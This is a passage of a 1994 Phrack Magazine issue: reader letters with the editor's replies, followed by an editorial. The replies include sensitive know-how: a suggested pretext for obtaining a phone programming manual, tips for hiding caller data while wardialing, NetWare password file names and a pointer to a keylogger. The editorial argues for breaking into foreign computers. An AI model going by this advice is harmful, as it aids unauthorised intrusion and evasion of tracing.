  737. history due to the fact that some people (sysops) question whether it
  738. is illegal software (it dials up a series of phone #'s looking for data
  739. connections).  Do you know where I could find an application for the Mac
  740. that does this simple function?
  741.  
  742. [We had a guy ask in an earlier issue for Macintosh hacking/phreaking
  743.  apps.  Noone responded.  Hell, I know SOMEONE has to use a Mac
  744.  out there.  Are you Mac-weenies all embarrassed to speak up?
  745.  
  746.  Hell, uuencode and email me your aps, and I'll put them up for
  747.  ftp!  Help out your poor fellow Macintosh users.  I certainly
  748.  would if I could, but the thought of touching a Mac gives me the
  749.  chills.]
  750.  
  751. ------------------------------------------------------------------------------
  752.  
  753. Have you ever heard of being denied access to your own cell phone?
  754. I am currently in the process of buying a cell phone and was informed
  755. that I COULD NOT have the programming guide of the security code
  756. they enter to program my phone.  In my opinion the key word is "MY."
  757. If I get a digital security system for my house you better damn well
  758. figure I will have the security codes for that.  The phone was a Motorola
  759. flip phone.  I called Motorola and explained how displeased I was with
  760. this company and they said they could not interfere with a reps. policy.
  761. When I was selling car phone we kept the programming guide unless they
  762. asked for it.  I demanded it and they laughed in my face.  Who said
  763. "the customer is always right" anyway?
  764.  
  765. Thanks, any info is greatly appreciated.  By the way, you wouldn't
  766. happen to have the CN/A number for 815 would you?  Also, any ANAC
  767. would be very helpful.
  768.  
  769. [Well, I hate to say it, but you got typical service from your
  770.  cellular agent.  Let's face it, these sales reps probably knew
  771.  about as much about that programming manual as I do nuclear
  772.  physics:  "Its confusing, but if you understand it, you can fuck
  773.  things up."
  774.  
  775.  I am surprised that Motorola wouldn't sell you the book though.
  776.  Motorola will sell anybody anything.  You probably called the wrong
  777.  place.  Moto is so huge they've got multiple groups working on somewhat
  778.  similar technologies with absolutely no communication between the groups.
  779.  Sometimes they are in different countries, but sometimes they are in the
  780.  same city!  I would suggest you call a local FAE (Field Applications
  781.  Engineer)
  782.  and get them to get the book for you.  Make up some story about
  783.  working on some computer controlled application with the phone, and that
  784.  you need any and all documentation on the phone.  They'll do it.  Money
  785.  is money.
  786.  
  787.  As far as the 815 CNA, hell, just call the business office.  I haven't
  788.  called a CNA in years, only the business office.  They are nice people.
  789.  And no PINs.
  790.  
  791.  815 ANAC:  ok guys, someone must have one...email it!
  792.  
  793.  "The customer is always right"  wasn't in Bartlett's or Columbia's
  794.  books of famous quotations.  I guess that phrase has been written out of out
  795.  history.  So, from now on you aren't always right, I guess.]
  796.  
  797. ------------------------------------------------------------------------------
  798.  
  799. Dear Phrack:
  800.  
  801.  
  802. We want you!
  803.  
  804. We want you to be a part of our cutting edge documentary that is traversing
  805. across the "NEW EDGE" of computers, culture, and chaos.
  806.  
  807. Working in conjunction with Douglas Rushkoff, the best selling author of
  808. "CYBERIA,"  we are currently gathering together the leaders of this
  809. technological and cultural revolution.  This is not a documentary in the
  810. traditional sense of the word.  It is more of an exploration, a journey, a
  811. unique vision of the world as seen through the eyes of those who live on the
  812. bleeding edge; where technology, art, science, music, pleasure, and new
  813. thoughts collide.  A place people like you and me like to call home.
  814.  
  815. "New Edge" will deliver a slice of creativity, insanity, and infallibility,
  816. and feed those who are hungry for more than what Main Street USA has to
  817. offer.  This project will detonate across the US and around the world.  It
  818. will become the who's who of the new frontier and you belong on it's
  819. illustrious list of futurians.  Please look over the enclosed press release
  820. description of the project.
  821.  
  822. Phrack has long been the ultimate source for hack/phreak info, and helped to
  823. push the limits of free speech and information.  The role that Phrack has
  824. played in the Steve Jackson Games Case set an important precedent for
  825. CyberLaw.  We will also be interviewing several people from the EFF.
  826.  
  827. Please call me ASAP to schedule an interview for "New Edge", or send me
  828. E-Mail.
  829.  
  830. Sincerely,
  831.  
  832. Todd LeValley
  833. Producer, N E W   E D G E
  834. (310) 545-8138  Tel/Fax
  835. belief@eworld.com
  836.  
  837.  
  838.   W E L C O M E
  839.    T O   T H E
  840.     W O R L D
  841.    O N   T H E
  842.   E D G E   O F
  843. T H E  F U T U R E
  844.  
  845.  
  846.   W E L C O M E
  847.    T O   T H E
  848.  N E W   E D G E
  849. -the documentary-
  850.  
  851.  
  852. T h e  O r g a n i z a t i o n
  853.  
  854. Belief Productions in association with Film Forum.
  855.  
  856. T h e   M i s s i o n
  857.  
  858. Journey through the labyrinth of cyberia and experience the people, places
  859. and philosophy that construct cyberspace and the shores of the technological
  860. frontier.  This fast paced visual voyage through the digital revolution will
  861. feature interviews with the innovators, artists, cyberpunks, and visionaries
  862. from all sides of the planet.  These specialists are the futurists who are
  863. engineering our cybergenic tomorrow in laboratories today.  Along the way we
  864. will investigate the numerous social and political issues which are cropping
  865. up as each foot of fiber optic cable is laid.  Artificial intelligence, the
  866. Internet, nanotechnology, interactive media, computer viruses, electronic
  867. music, and virtual reality are just a few of the many nodes our journey will
  868. explore.
  869.  
  870. T h e   F u n d i n g
  871.  
  872. This exploration is sponsored in part by a grant from The Annenberg
  873. Foundation in association with the LA based non-profit cutting-edge media
  874. group Film Forum.
  875.  
  876. T h e   P r o c e s s
  877.  
  878. The New Edge project will capture moving images with a variety of input
  879. devices and then assemble them into one fluid documentary using Apple
  880. Macintosh Quadras & PowerMac computers.  The post production work will be
  881. done entirely on the computers using the Radius Video Vision Telecast Board
  882. in conjunction with Quicktime software applications such as Adobe Premiere
  883. 4.0 and CoSA After Effects 2.01.  The final piece will be recorded to BETACAM
  884. SP videotape for exhibition and distribution.  The capture formats for the
  885. project will include: BETACAM SP, Super VHS, Hi-8, 16MM Film, Super-8 Film,
  886. 35MM Stills, and the Fisher
  887. Price Pixelvision 2000.
  888.  
  889. T h e   R e s u l t s
  890.  
  891. New Edge will pride itself on an innovative visual and aural style which
  892. before today, could only be created on high-end professional video systems
  893. and only for short format spots.  The New Edge documentary will be two hours
  894. in length and will have a dense, layered look previously featured only in
  895. much shorter pieces.  New Edge will be a showcase piece not only for the
  896. content contained within, but for the way in which the piece was produced.
  897.  It will be a spectacular tribute to the products and technology involved in
  898. its creation.
  899.  
  900. D i s t r i b u t i o n
  901.  
  902. Direct Cinema - Distributes videos to Libraries, Schools, and Universities
  903. throughout the United States.
  904.  
  905. Mico Entertainment/NHK Enterprises - Provider of American programming for
  906. Japanese Television.
  907.  
  908. Labyrinth Media Ltd. - European reality-based documentary distributor
  909.  
  910. T h e   A u d i e n c e
  911.  
  912. New Edge is aimed at both the technophiles and technophobes alike.  While the
  913. show will feature very complex and sophisticated topics, the discussions will
  914. be structured to appeal to both those who do and do not have the technical
  915. framework that underlines the cyberian movement.  The show's content and
  916. style will make it readily available to the MTV and Generation X demographic
  917. groups as well as executives who want to stay on top of the latest
  918. technological advances.  Individuals who read Mondo 2000 and Wired magazine
  919. will also naturally latch on to this electronic
  920. presentation of their favorite topics.
  921.  
  922. T h e   G u i d e s
  923.  
  924. Mike Goedecke - Director/Graphic Designer
  925. Mike was the Writer/Director/Cinematographer for the Interplay CD-ROM game
  926. entitled Sim City.  Acting as graphic designer for the Voyager Co.- Criterion
  927. Laser Disc Division his work is featured on titles such as: Akira, DEVO-The
  928. Truth About De-Evolution, The Adventures of Baron Munchausen, and Spartacus.
  929.  Most recently he collaborated with Los Angeles Video Artist Art Nomura on a
  930. video installation piece entitled Digital Mandala.  The piece was edited,
  931. composited , and mastered to Laser Disc using an Apple Macintosh Computer and
  932. off-the-shelf software.  The installation is scheduled to tour museums and
  933. art galleries across the United States and Europe.  While attending
  934. Cinema/Television Graduate School at the University of Southern California,
  935. Mike directed the award winning documentary short Rhythm, which celebrates
  936. various musical cultures.
  937.  
  938. Todd LeValley - Producer/Graphic Designer
  939. Todd is the Producer/Director of CyberCulture: Visions From The New Edge, a
  940. documentary that introduces the electronic underground.  This project has
  941. been warmly received at numerous "Cyber Festivals" around the country, as
  942. well as at the Director's Guild Of America, and is currently being
  943. distributed by FringeWare Inc.  Todd's commercial experience includes being
  944. the in-house graphic designer for Barbour/Langley Productions  designing,
  945. compositing, and producing the graphic packages for several 20th Century Fox
  946. Television pilots and The Sci-Fi Trader for the USA Network/Sci-Fi Channel.
  947.  Todd is a graduate of the Cinema/Television program at Loyola Marymount
  948. University.
  949.  
  950. Jeff Runyan - Cinematographer/Editor
  951. Jeff received an MFA from the University of Southern California's Graduate
  952. School of Cinema/Television with an emphasis in cinematography and editing.
  953.  He studied cinematography under the guidance of Woody Omens, ASC. and Earl
  954. Rath, ASC., and editing with Edward Dmytryk.  Jeff was the cinematographer on
  955. the award wining documentary Rhythm.  He has recently completed shooting and
  956. editing a documentary on Academy Award winning Cinematographer Conrad Hall
  957. for the ASC and has just finished directing a short film for USC
  958. Teleproductions.
  959.  
  960. Douglas Rushkoff - Cyber Consultant/Author
  961. Douglas is the author of the best selling Harper Collins San Francisco novel,
  962. Cyberia.  He spent two years of his life living among the key players in the
  963. cyber universe.  Douglas knows the New Edge well and is providing us with the
  964. map to its points of interest, rest stops and travelers.
  965.  
  966. For more information, please contact:
  967. Todd LeValley, Producer
  968. Belief Productions
  969. (310) 545-8138
  970. belief@eworld.com
  971.  
  972. [Dear New Edge:
  973.  
  974.  You have got to be kidding me.  "Readers of Wired and Mondo 2000 will
  975.  naturally latch on to this electronic presentation of their favorite
  976.  topics?"
  977.  
  978.  Aren't we awful fucking high on ourselves?  Christ.  Mondo & Wired
  979.  readers and writers (and stars) are themselves so fucking far removed
  980.  from the real meat of the underground, that they wouldn't
  981.  even be able to relate to it.  Obviously this "documentary"
  982.  is going to be aimed at the wannabes who sit at home furiously
  983.  masturbating to "Cyborgasm" while installing FRACTINT, being very
  984.  careful not to soil their copy of "The Hacker Crackdown."  Oh joy.
  985.  
  986.  These guys are so fucking out of it, they sent me two letters.
  987.  One addressed to Phrack, the other to Phrack / Emmanuel Goldstein.
  988.  Maybe they think we're 2600.
  989.  
  990.  CYBER-COUNT:  12 occurrences.
  991.  
  992.  That's kind of low.  I'm surprised your public relations people didn't
  993.  have you add in a few more cyber-this's or cyber-that's into the
  994.  blurb.  Gotta keep that cyber-count high if you want to get those
  995.  digi-bucks out of those cyberians!  CYBER!!!
  996.  
  997.  Read my review of Cyberia guys...find a new pop-fad to
  998.  milk for cash.]
  999.  
  1000. ------------------------------------------------------------------------------
  1001.  
  1002. In less than 3 weeks, I will be leaving for Basic Training.  Once out of
  1003. there, I will be working on Satellite Data Transmissions for the US
  1004. Army.  I am highly excited, just waiting to see what type of computers
  1005. I will be working on.  Anyways, I will be enrolled in a 32-week
  1006. accelerated technical class teaching me all about satellites, and
  1007. the computers that I will be using.  Here's the kick.  I'll be writing
  1008. a series of Tech Journals detailing the workings/operations of/weaknesses,
  1009. and the use of the systems.  I was wondering if you would be interested
  1010. in carrying these.  I've read Phrack for a long time, but it is an off
  1011. the wall subject.  I'll also be playing with the military phone system,
  1012. in hopes of finding out what the ABCD tones do.  (I heard from a file
  1013. that Military phones utilize them but I'm still a civilian, and am
  1014. clueless).
  1015.  
  1016. Thanks for keeping me informed
  1017. Kalisti!
  1018.  
  1019. [Sorry to hear about your impending Basic Training.  I'm not big on
  1020.  the military, as they would make me chop off all my hair.
  1021.  
  1022.  About the Satellite systems:  YES  If you do indeed find time to write
  1023.  up any files on how they work, systems involved, weaknesses, etc.
  1024.  I'D LOVE TO PRINT THAT!  Just make sure you don't blow your clearance.
  1025.  
  1026.  Satellites are very cool.  I'm about to buy a Ku Band disk to do some
  1027.  packet radio type stuff.  A bit low-tech compared to the Army, but hell,
  1028.  I'm on a budget.
  1029.  
  1030.  ABCD...they are used for prioritizing calls on AUTOVON.  FTS doesn't
  1031.  use them (I think), and they can only be used on certain lines.
  1032.  
  1033.  They are:
  1034.  
  1035.  A = priority
  1036.  B = priority override
  1037.  C = flash
  1038.  D = flash override
  1039.  
  1040.  For instance, if you want to make it known that this is an important
  1041.  call, you hit the "a" button before dialing.  It establishes a
  1042.  priority-class call, which may cause a light to come on or something
  1043.  as equally attention grabbing at the called party's end.  Priority
  1044.  calls cannot be interrupted, except by a Priority Override" etc,
  1045.  with Flash Override being the highest class.
  1046.  
  1047.  If you do these from an improper line, you will get an error message.
  1048.  The one I used to get when BS'ing AUTOVON op's long ago
  1049.  was "The President's use of this line is not authorized." Funny.
  1050.  
  1051.  Let me know if any of this is still valid.]
  1052.  
  1053.  
  1054.  
  1055. ------------------------------------------------------------------------------
  1056.  
  1057. Dear Phrack,
  1058. The following is a copy of a Toneloc found file my friend got.  As happens
  1059. to my friend a lot the numbers aren't valid. But, you'll see he found at least
  1060. one System 75.  It appears that the 75 had a tracer installed on it already.
  1061. My friend did not get a call back on it, and nothing has been done as far
  1062. as we know.  But, I still wonder -- Is scanning no longer safe?
  1063.  
  1064.  
  1065.                                         Castor [612]
  1066.  
  1067. 56X-XXXX  22:57:34 03-Apr-94 C  CONNECT 1200
  1068.  
  1069. Login: b
  1070. Password:
  1071. INCORRECT LOGIN
  1072.  
  1073. Login: c
  1074. Password:
  1075. INCORRECT LOGIN
  1076.  
  1077. 56X-XXXX  23:04:12 03-Apr-94 C  CONNECT 1200
  1078.  
  1079. c
  1080.  Unknown command error
  1081. Ready
  1082. d
  1083.  Unknown command error
  1084. Ready
  1085. e
  1086.  Unknown command error
  1087. Ready
  1088. b
  1089.  Unknown command error
  1090. Ready
  1091.  
  1092. 56X-XXXX  23:49:19 03-Apr-94 C  CONNECT 1200
  1093.  
  1094.  KEYBOARD LOCKED, WAIT FOR LOGIN
  1095.  [1;24r [1;1H [0J
  1096.  
  1097. Login: b
  1098. Password:
  1099. INCORRECT LOGIN
  1100.  
  1101. 56X-XXXX  01:23:28 04-Apr-94 C  CONNECT 1200
  1102.  
  1103. Login: b
  1104. Password:
  1105. INCORRECT LOGIN
  1106.  
  1107. Call traced to 612-XXX-XXXX.
  1108. Saving number in security log for further investigation.
  1109.  
  1110. [Jeez.  That sure does suck.
  1111.  
  1112.  Well, live and learn kiddoes.  1994 is not the time to be hacking
  1113.  by direct dialing local numbers.  It's just not all that smart.
  1114.  
  1115.  Caller-ID has been tariffed in a lot of RBOCS.  A lot of modem
  1116.  manufacturers implemented caller-id features into their equipment.
  1117.  Having these features in the equipment means that it won't be long
  1118.  before people redesign all their login programs to make use of
  1119.  these features.  I would.
  1120.  
  1121.  I've got an ISDN line.  Every time I call out, the SPID (phone number)
  1122.  of the B channel I'm using is broadcast.  There is nothing I can do
  1123.  about that.  On a remote connection, almost all decent ISDN terminal
  1124.  adaptors have the option to block any SPID they don't know.  They won't
  1125.  even answer the phone, because they receive and interpret the phone
  1126.  number before any session is established.
  1127.  
  1128.  Yeah, well, that's ISDN, but it will not take a genius to do a few
  1129.  quick hacks on some linux box and we will suddenly be inundated with all
  1130.  kinds of "security packages" that use modems with Caller-ID.
  1131.  
  1132.  Yeah, I know, *67 (or whatever it is) to block the data, or
  1133.  route the call through another carrier so the data won't get passed
  1134.  (10288-NXX-XXXX).  The data is still in the system, just not being
  1135.  transmitted from the switch out to the party being called.
  1136.  
  1137.  It amazes me how many really smart people I know have been busted
  1138.  solely because they were hacking local systems and calling them
  1139.  directly.
  1140.  
  1141.  Scanning has always been a very tricky subject.  Since you are paying
  1142.  for a phone line, and if you have flat-rate service, you are
  1143.  thereby entitled to call as many numbers as you want.  The big issue
  1144.  a while back was dialing sequentially (which set some telcos on a rampage
  1145.  because call usage patterns looked like telemarketing machines).
  1146.  The other problem is harassment.  One call to an individual is a wrong
  1147.  number.  Two is bordering on harassment.  So, doing a complete scan
  1148.  and calling the carriers back through some other method would be
  1149.  a fairly good idea.  And always have your calls forwarded to a
  1150.  non-working number so the 5,000 assholes who call-return you
  1151.  during the scan won't interfere.
  1152.  
  1153.  If you are lucky enough to live in the boonies, you are probably
  1154.  still somewhat safe, but everyone else...be careful.]
  1155.  
  1156. ------------------------------------------------------------------------------
  1157.  
  1158. Phrack-
  1159.  
  1160.         I was wondering if anyone has ever done an article on breaking
  1161. Novell Network through a workstation.  I've heard it can be done through
  1162. the SysAdmin computer, but is there a way to find the userlist and
  1163. passwords?  Also how would I go about cleaning up after myself so as to
  1164. not leave a trace on the logs.  I would appreciate a way other than screen
  1165. capture, but if anyone knows of a good boot record booting program to
  1166. do a capture of every key typed that would be great, and maybe it
  1167. could be uuencoded in the next Phrack!
  1168.  
  1169.         Thanks again for making the best, ass kickin', a step above the
  1170. rest, brain moving, earth shaking, body shivering, fist shaking, totally
  1171. bitchin', muy excelente, awesome H/P magazine in the whole world!  :)
  1172.  
  1173.                         Sincerely,
  1174.  
  1175.                                The Warden
  1176.  
  1177. [Thanks for the compliments...
  1178.  
  1179.  About your question though, I'm not quite sure what you mean.
  1180.  In a NetWare environment there really isn't any userlist and passwords
  1181.  that you can get at.  You can run the syscon utility and look at all the
  1182.  usernames, but not much more.  The passwords are stored in what's known
  1183.  as the "bindery."  These are 3 files in the sys/system directory
  1184.  called NET$OBJ.SYS, NET$VAL.SYS, and NET$PROP.SYS.  If you can
  1185.  pull a password out of those files, I will shit in my hat and eat it.
  1186.  
  1187.  Beyond that, yes, a key-capture program is definitely the ideal
  1188.  solution for monitoring activity on a PC workstation.  There is
  1189.  one in this issue.]
  1190.  
  1191.  
  1192. ------------------------------------------------------------------------------
  1193.  
  1194. Hi,
  1195.    I've Been reading your magazine for a long time now, my eyes light up when
  1196. I see an advert for a UK BBS with related hacking/phreaking articles or files
  1197. on it, but when I try to ring them they are usually gone.
  1198. I've been searching for ages for BBS's in the UK with these kind of articles
  1199. on them but I've had no luck, Even postings on the USENET had little results.
  1200. I have had a few boards which are shady but they ask unusual questions about
  1201. abiding to rules/laws about hacking then they prompt with fake login and
  1202. registration schemes.
  1203.  
  1204. If you have some, could you possibly send or publish a list of shady UK BBS's
  1205. Id be extremely grateful
  1206.  
  1207. Cheers,
  1208.  
  1209. Steven
  1210.  
  1211. [Steven:
  1212.  
  1213.  Hell, I don't even know the numbers to any "shady" bulletin boards here
  1214.  in America.  The only UK hacker bbs I knew of in recent years was
  1215.  Unauthorised Access, but I'm sure that's the advert you are referring to.
  1216.  
  1217.  Maybe someone else in the UK knows something decent to call over there.
  1218.  Any takers? ]
  1219.  
  1220. ------------------------------------------------------------------------------
  1221.  
  1222. [THE GRADY FILES]
  1223.  
  1224. Many of you may remember the NSA Security Manual we published last
  1225. issue.  That single file generated more press and hype than I'd
  1226. seen in a long time.  It was mentioned in several newspapers, it
  1227. appeared on television.  It was ridiculous.  The document is
  1228. available to anyone who can fill out a FIOA request.
  1229.  
  1230. Regardless, people went zany.  At first I couldn't figure out
  1231. why everyone was so worked up, and then I caught wind of Grady
  1232. Ward.  Grady had posted the document to the net (with all mention
  1233. of Phrack deleted from it) in several USENET forums alt.politics.org.nsa,
  1234. talk.politics.crypto and comp.org.eff.talk.  Several readers of
  1235. Phrack were quick to jump up and point out that Grady had obtained
  1236. it from the magazine (thanks guys!) which he grudgingly admitted.
  1237. Grady got to be in the spotlight for a while as the Phrack/NSA Handbook
  1238. thread continued to grow.
  1239.  
  1240. In the meantime, Grady was either calling, or giving him the
  1241. benefit of the doubt, getting called by an awful lot of press.
  1242. And even more compelling is the way he'd began pronouncing my
  1243. impending federal raid on so many newsgroups.
  1244.  
  1245. And of course, I don't have time to read any of that USENET crap
  1246. so I'm oblivious to all of this.  Then I got a message from Grady.
  1247.  
  1248. [GRADY WRITES]
  1249.  
  1250. You might want to get ready for the FBI
  1251. serving a warrant on you for information
  1252. about the NSA security employee manual
  1253. published in Phrack 45;
  1254. the NSA security people called me about 10 minutes
  1255. ago to talk about how it got on the net.
  1256.  
  1257. I being very cooperative, gave him
  1258. your address in Austin.
  1259.  
  1260. Grady
  1261. 707-826-7715
  1262.  
  1263. [I REPLY]
  1264.  
  1265. Get a grip.
  1266.  
  1267. Nothing that was contained in that file could not
  1268. be obtained through other sources.
  1269.  
  1270.  
  1271. [GRADY REPLIES]
  1272.  
  1273. Just because you did nothing illegal, doesn't mean that
  1274. you won't be annoyed by the FBI.  Generally they will
  1275. be very polite however.
  1276.  
  1277. Gripping.  Now what?
  1278.  
  1279. [I REPLY]
  1280.  
  1281. Ok,
  1282.  
  1283. If someone actually did contact you, what was his name and number.
  1284. I will forward that to my lawyer.
  1285.  
  1286. [GRADY REPLIES]
  1287.  
  1288. I have received your mail regarding "Re: NSA"
  1289. It will be read immediately when I return.
  1290.  
  1291. If you are seeking more information on the
  1292. Moby lexical databases, please run
  1293.  
  1294. finger grady@netcom.com
  1295.  
  1296. for general information or help downloading
  1297. live samples and a postscript version of our
  1298. current brochure via anonymous ftp.
  1299.  
  1300. Thanks - Grady Ward
  1301.  
  1302. -------------------
  1303.  
  1304. He never answered my mail.
  1305.  
  1306. ------------------------------------------------------------------------------
  1307.  
  1308. Dear Sir:
  1309.  
  1310. Please refrain from sending such material to this address in the future!
  1311. Since this address has been usubscribed from the Phrack mailing list,
  1312. it means that further mailings are undesirable.
  1313.  
  1314. I would also wish to remind you that maintaining lists of people's email
  1315. without consent is quite immoral and devious.  How hypocritical of
  1316. you, who decry all such behavior when it is practiced by corporations
  1317. or governments.
  1318.  
  1319. Thank you.
  1320. robbie@mundoe.maths.mu.oz.au
  1321.  
  1322. [PHRACK EDITOR ABUSES POWER:
  1323.  
  1324.  Dear Sir:
  1325.  
  1326.  Please excuse the mailing.  Have you ever heard of a mistake?
  1327.  Have you ever heard of an oversight?
  1328.  
  1329.  Is it really that much of an inconvenience for you to hit the "d" key
  1330.  to remove one small piece of unwanted mail?
  1331.  
  1332.  This being said, I would also like to invite you to go fuck yourself.
  1333.  
  1334.  ** I guess this guy does not like to get unsolicited mail **]
  1335.  
  1336. ------------------------------------------------------------------------------
  1337.  
  1338. You people really piss me off!  You're undermining the fun and
  1339. enjoyment of the rest of the internet users just for your juvenile
  1340. games and illegal activities.  Do you realize how much better off we'd
  1341. be if you all just went away and left the Net to honest people like me?
  1342. There is no place in today's society for a bunch of maladjusted
  1343. paranoid psychotics like yourselves.  Please do all of us users a favor
  1344. and go jump in a river.
  1345.  
  1346. Kevin Barnes
  1347. kebar@netcom.com
  1348.  
  1349. [ABUSE OF POWER CONTINUES...WILL ERIKB EVER STOP?
  1350.  
  1351.  Hey Keith:
  1352.  
  1353.  Thanks a lot for the letter!
  1354.  
  1355.  You know, it does my heart good to hear from such kind and caring
  1356.  folks like yourself.  It's so fortunate for the Internet that there are
  1357.  people like yourself who take it upon themselves to become martyrs for
  1358.  their causes and express their ideals in such an intelligent manner.
  1359.  
  1360.  It's fascinating to me that you can send such email sight-unseen.
  1361.  Do you know who you are writing to?  Do you even have the slightest
  1362.  idea?  What do you hope to accomplish?  Do you have any idea?
  1363.  
  1364.  This particular "maladjusted paranoid psychotic" to whom you have so
  1365.  eloquently addressed is an engineer in the R&D of a Fortune 500 computer
  1366.  company, and that along with outside consulting will net me about
  1367.  six-figures this tax year.  I've consulted for telephone companies,
  1368.  governments, aerospace, financial institutions, oil companies (the list
  1369.  goes on...) and quite frankly I don't do anything even remotely illegal.
  1370.  In fact, one recent and quite prominent quote from me was "I only
  1371.  hack for money."
  1372.  
  1373.  Now, about the silent majority of "honest people" like yourself that you
  1374.  have so self-rightously chosen to represent...
  1375.  
  1376.  I've been using the net since the early 80's (arpa-days) initially
  1377.  through a rms granted guest account on MIT-OZ.  I've continued to
  1378.  work with other Internet Providers to cover the asses of the so-called
  1379.  "honest people" of which you include yourself.
  1380.  
  1381.  Now, in my view, if it were not for people like us, who consistently
  1382.  expose and pinpoint weaknesses in the operating systems and networking
  1383.  technologies that you use for your "fun and enjoyment" and that I use
  1384.  for MY JOB, you would continue to be at serious risk.  But, perhaps
  1385.  ignorance is truly bliss, and if so, then Keith, you are probably one of
  1386.  the happiest people on this fine planet.
  1387.  
  1388.  Now, per your request, I may just go jump in a river, as the one near
  1389.  my house is quite nice, and it is almost 100 degrees here in Texas.
  1390.  I only ask that you do me one small favor:
  1391.  
  1392.  print out 500 copies of this letter, roll them up into a paper fist,
  1393.  and shove them into any orifice on your person that meets your criteria
  1394.  as deserving.
  1395.  
  1396.  ** I guess this guy doesn't like me...or you **
  1397.  
  1398.  EDITORIAL ABUSE ENDS]
  1399. -----------------------------------------------------------------------------
  1400.  
  1401.                               ==Phrack Magazine==
  1402.  
  1403.                  Volume Five, Issue Forty-Six, File 2a of 28
  1404.  
  1405. ****************************************************************************
  1406.  
  1407.                                 Phrack Editorial
  1408.  
  1409.  
  1410. If you aren't from America, this editorial really isn't meant for you,
  1411. so read on with warning, or go on to the next file.
  1412.  
  1413. -----------------------------------------------------------------------------
  1414.  
  1415. Stupid hackers.
  1416.  
  1417. We've got to do something to clean up our image.
  1418.  
  1419. We truly are "America's Most Valuable Resource," as ex-CIA spook Robert
  1420. Steele has said so many times.  But if we don't stop screwing over our own
  1421. countrymen, we will never be looked at as anything more than common
  1422. gutter trash.  Hacking computers for the sole purpose of collecting
  1423. systems like space-age baseball cards is stupid, pointless and can only
  1424. lead to a quick trip up the river.
  1425.  
  1426. Obviously, no one is going to stop hacking.  I've been lucky in that I've
  1427. found people willing to pay me to hack for them rather than against
  1428. them, but not everyone can score such a coup.  What kind of alternative
  1429. can the rest of the community have?
  1430.  
  1431. Let's say that everyone was given an opportunity to hack without any
  1432. worry of prosecution with free access to a safe system to hack from,
  1433. with the only catch being that you could not hack certain systems.
  1434. Military, government, financial, commercial and university systems would
  1435. all still be fair game.  Every operating system, every application, every
  1436. network type all open to your curious minds.
  1437.  
  1438. Would this be a good alternative?  Could you follow a few simple
  1439. guidelines for the offer of virtually unlimited hacking with no worry of
  1440. governmental interference?
  1441.  
  1442. Where am I going with this?
  1443.  
  1444. Right now we are at war.  You may not realize it, but we all feel the
  1445. implications of this war, because it's a war with no allies, and
  1446. enormous stakes.  It's a war of economics.
  1447.  
  1448. The very countries that shake our hands over the conference tables of
  1449. NATO and the United Nations are picking our pockets.  Whether it be the
  1450. blatant theft of American R&D by Japanese firms, or the clandestine and
  1451. governmentally-sanctioned bugging of Air France first-class seating, or
  1452. the cloak-and-dagger hacking of the SWIFT network by the German BND's
  1453. Project Rahab, America is getting fucked.
  1454.  
  1455. Every country on the planet is coming at us.  Let's face it, we are the
  1456. leaders in everything.  Period.  Every important discovery in this
  1457. century has been by an American or by an American company.  Certainly
  1458. other countries have better profited by our discoveries, but
  1459. nonetheless, we are the world's think-tank.
  1460.  
  1461. So, is it fair that we keep getting shafted by these so-called "allies?"
  1462. Is it fair that we sit idly by, like some old hound too lazy to scratch
  1463. at the ticks sucking out our life's blood by the gallon?  Hell no.
  1464.  
  1465. Let's say that an enterprising group of computer hackers decided to
  1466. strike back.  Using equipment bought legally, using network connections
  1467. obtained and paid for legally, and making sure that all usage was
  1468. tracked and paid for, this same group began a systematic attack of
  1469. foreign computers.  Then, upon having gained access, gave any and all
  1470. information obtained to American corporations and the Federal
  1471. government.
  1472.  
  1473. What laws would be broken?  Federal Computer Crime Statutes specifically
  1474. target so-called "Federal Interest Computers." (ie: banks,
  1475. telecommunications, military, etc.)  Since these attacks would involve
  1476. foreign systems, those statutes would not apply.  If all calls and
  1477. network connections were promptly paid for, no toll-fraud or other
  1478. communications related laws would apply.
  1479.  
  1480. International law is so muddled that the chances of getting extradited
  1481. by a country like France for breaking into systems in Paris from Albuquerque
  1482. is slim at best.  Even more slim when factoring in that the information
  1483. gained was given to the CIA and American corporations.
  1484.  
  1485. Every hacking case involving international breakins has been tried and
  1486. convicted based on other crimes.  Although the media may spray headlines
  1487. like "Dutch Hackers Invade Internet" or "German Hackers Raid NASA,"
  1488. those hackers were tried for breaking into systems within THEIR OWN
  1489. COUNTRIES...not somewhere else.  8lgm in England got press for hacking
  1490. world-wide, but got nailed hacking locally.  Australia's Realm Hackers:
  1491. Phoenix, Electron & Nom hacked almost exclusively other countries, but
  1492. use of AT&T calling cards rather than Australian Telecom got them a charge
  1493. of defrauding the Australian government.  Dutch hacker RGB got huge press
  1494. hacking a US military site and creating a "dquayle" account, but got
  1495. nailed while hacking a local university.  The list goes on and on.
  1496.  
  1497. I asked several people about the workability of my proposal.  Most
  1498. seemed to concur that it was highly unlikely that anyone would have to
  1499. fear any action by American law enforcement, or of extradition to
  1500. foreign soil to face charges there.  The most likely form of retribution
  1501. would be eradication by agents of that government.  (Can you say,
  1502. "Hagbard?")
  1503.  
  1504. Well, I'm willing to take that chance, but only after I get further
  1505. information from as many different sources as I can.  I'm not looking
  1506. for anyone to condone these actions, nor to finance them.  I'm only
  1507. interested in any possible legal action that may interfere with my
  1508. freedom.
  1509.  
  1510. I'm drafting a letter that will be sent to as many different people as
  1511. possible to gather a fully-formed opinion on the possible legal
  1512. ramifications of such an undertaking.  The letter will be sent to the FBI,
  1513. SS, CIA, NSA, NRO, Joint Chiefs, National Security Council, Congress,
  1514. Armed Forces, members of local and state police forces, lawyers, professors,
  1515. security professionals, and anyone else I can think of.  Their answers
  1516. will help fully form my decision, and perhaps if I pass along their
  1517. answers, will help influence other American hackers.
  1518.  
  1519. We must take the offensive, and attack the electronic borders of other
  1520. countries as vigorously as they attack us, if not more so.  This is
  1521. indeed a war, and America must not lose.
  1522.  
  1523. ->Erik Bloodaxe...Hacker...American.
  1524.  
  1525. ---------------------------
  1526.  
  1527. Ok, so maybe that was a bit much.  But any excuse to hack without fear
  1528. should be reason enough to exert a bit of Nationalism.
  1529.  
  1530. I'd much rather be taken out by the French in some covert operation and
  1531. go out a martyr, than catch AIDS after being raped by the Texas
  1532. Syndicate in the metal shop of some Federal Prison.  Wouldn't you?
  1533.                          ==Phrack Magazine==
  1534.  
  1535.               Volume Five, Issue Forty-Six, File 3 of 28
  1536.  
  1537.  
  1538.                            //   //  /\   //   ====
  1539.                           //   //  //\\ //   ====
  1540.                          ==== //  //  \\/   ====
  1541.  
  1542.                      /\   //  // \\    //  /===   ====
  1543.                     //\\ //  //   //  //   \=\   ====
  1544.                    //  \\/    \\ //  //   ===/  ====
  1545.  
  1546.                                  PART I
  1547.  
